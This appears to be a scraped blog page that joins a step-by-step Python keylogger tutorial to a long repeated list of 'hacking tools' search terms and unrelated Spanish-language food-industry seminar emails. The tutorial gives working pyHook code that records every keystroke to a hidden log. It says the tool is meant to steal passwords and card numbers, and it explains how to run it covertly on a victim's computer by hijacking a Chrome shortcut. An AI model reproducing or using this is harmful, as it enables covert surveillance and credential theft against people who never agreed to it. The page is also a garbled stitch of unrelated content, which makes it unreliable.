sábado, 20 de enero de 2024

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
Related word
  1. Hack Tools For Ubuntu
  2. Hack Tools Download
  3. Pentest Tools Android
  4. Hacker
  5. New Hacker Tools
  6. Hacking Tools Usb
  7. Pentest Tools Alternative
  8. Pentest Tools Review
  9. Hacker Tools Hardware
  10. Pentest Tools For Ubuntu
  11. Kik Hack Tools
  12. Hacking Tools For Mac
  13. Pentest Tools For Mac
  14. How To Make Hacking Tools
  15. Best Hacking Tools 2020
  16. Hacking Tools And Software
  17. Easy Hack Tools
  18. Hacking Tools Pc
  19. Hack Tool Apk
  20. Nsa Hacker Tools
  21. Hackers Toolbox
  22. Termux Hacking Tools 2019
  23. Termux Hacking Tools 2019
  24. Ethical Hacker Tools
  25. Pentest Tools Windows
  26. Hacking Tools For Windows 7
  27. Hacking Tools Name
  28. Hack Tools For Mac
  29. How To Make Hacking Tools
  30. Hacker Tools Apk Download
  31. Pentest Tools For Windows
  32. Hacks And Tools
  33. Hacking Tools Online
  34. Hacking Tools Download
  35. Pentest Tools Find Subdomains
  36. Pentest Reporting Tools
  37. Hackrf Tools
  38. Hack Website Online Tool
  39. Hacking Tools Kit
  40. Pentest Tools
  41. Usb Pentest Tools
  42. Hack Tools Online
  43. Pentest Tools Online
  44. Hack Tools
  45. Beginner Hacker Tools
  46. Termux Hacking Tools 2019
  47. Hacking Tools
  48. New Hack Tools
  49. Pentest Tools Review
  50. Hacking Tools For Mac
  51. Pentest Tools
  52. Hacker Security Tools
  53. Hacking Tools 2020
  54. Pentest Tools For Android
  55. Hacker Tools Windows
  56. Pentest Tools Download
  57. Pentest Tools Download
  58. Hacking Tools Windows 10
  59. How To Install Pentest Tools In Ubuntu
  60. Hacking Tools Hardware
  61. Hacker Security Tools
  62. Hacking Tools Mac
  63. Hacking Tools For Mac
  64. Hacking Tools
  65. Kik Hack Tools
  66. Pentest Tools Subdomain
  67. Hacker Tools Mac
  68. New Hacker Tools
  69. Android Hack Tools Github
  70. Free Pentest Tools For Windows
  71. Pentest Tools Website Vulnerability
  72. Nsa Hacker Tools
  73. Hacker Tools Github
  74. Hacker Tools For Mac
  75. Hack Rom Tools
  76. Hacking Tools Name
  77. Physical Pentest Tools
  78. Hack Tools For Pc
  79. Pentest Tools Website
  80. Hacker Tools Free
  81. Pentest Tools Framework
  82. Free Pentest Tools For Windows
  83. Hacker Tools Online
  84. Hack Tools Pc
  85. Pentest Tools
  86. Hacking Tools For Games
  87. Hack Website Online Tool
  88. Hak5 Tools

🔥 Calendario de Seminarios Febrero 2024

  -  

Solicita más información de nuestros programas de entrenamiento.

Seminarios para la Industria Alimentaria

¡Obtén un descuento especial!

Asegura tu lugar y obtén un descuento especial por pago anticipado.

Seminario Online en vivo:
Microbiología e Inocuidad de los Alimentos.

📆 Fecha: 6 de febrero.

Descargar Temario ↓

Seminario Online en vivo:
Planeador Maestro de Producción para la Industria Alimentaria.

📆 Fecha: 9 de febrero.

Descargar Temario ↓

Seminario Online en vivo:
Formación de Jueces para Análisis Sensorial.

📆 Fecha: 13 de febrero.

Descargar Temario ↓

Seminario Online en vivo:
Actualización de NOM-127: Calidad del Agua y su Impacto en la Industria Alimentaria.

📆 Fecha: 16 de febrero.

Descargar Temario ↓

Seminario Online en vivo:
Suplementos Alimenticios, Legislación Sanitaria y Etiquetado.

📆 Fecha: 22 de febrero.

Descargar Temario ↓

Seminario Online en vivo:
Programa indispensable para el Gerente de Planta de Alimentos y Bebidas.

📆 Fecha: 23 de febrero.

Descargar Temario ↓

Seminario Online en vivo:
Determinación e Ingeniería de Costos en la Industria Alimentaria.

📆 Fecha: 28 de febrero.

Descargar Temario ↓

Seminario Online en vivo:
Etiquetado de alimentos para exportar a China, Japón y Australia.

📆 Fecha: 29 de febrero.

Descargar Temario ↓
LogoFSA

Recibe más información sobre nuestro programas de capacitación.
¡Contacta con nuestros ejecutivos!
(+521) 558 8 69 46 64

© Copyright, 2024, Cursos-LatinoAmérica • 21 338

You received this email because you are a client of Cursos-LatinoAmérica.
Click here to unsubscribe

  -  

ANGELICA AGUILAR VALDEZ ¡Especialízate en Microbiología Alimentaria!

  -  
Seminario especializado en Microbiología
Ver este mensaje en línea
LogoFSA

Call center: (+521)
55 88 69 46 64

¡Asegura la inocuidad de tu producción!

Microbiologia e inocuidad alimentaria

Seminario online en vivo:
Microbiología e Inocuidad de los Alimentos

Fecha: 08 de febrero de 2024 | Hora: 10:00 A.M.

Obtener más información del evento

Apreciable ANGELICA AGUILAR VALDEZ

¿Conoces los tipos de microorganismos, las enfermedades transmitidas por alimentos descompuestos y los métodos de detección de contaminación microbiana? Dominar este tema es un factor clave en el crecimiento de las empresas productoras de alimento para el consumo humano.

¡Especialízate en microbiología alimentaria!

Después de tomar este seminario aplicarás las metodologías más actuales de seguridad microbiológica para evitar los daños que producen los principales microorganismos, organismos de descomposición, y los patógenos que pueden afectar a la producción de alimentos.

Confirma tu participación y recibe sin costo nuestro curso grabado: Interpretación de Reportes Microbiológicos y un descuento especial en su inscripción.

Obtener Descuento por WhatsApp

Más información:
Customer support (+521) 55 88 69 46 64.

© Copyright, 2024, Cursos-LatinoAmérica • 21 338

Вы получили данную рассылку, так как являетесь клиентом или подписчиком Cursos-LatinoAmérica. Отказаться от рассылки

  -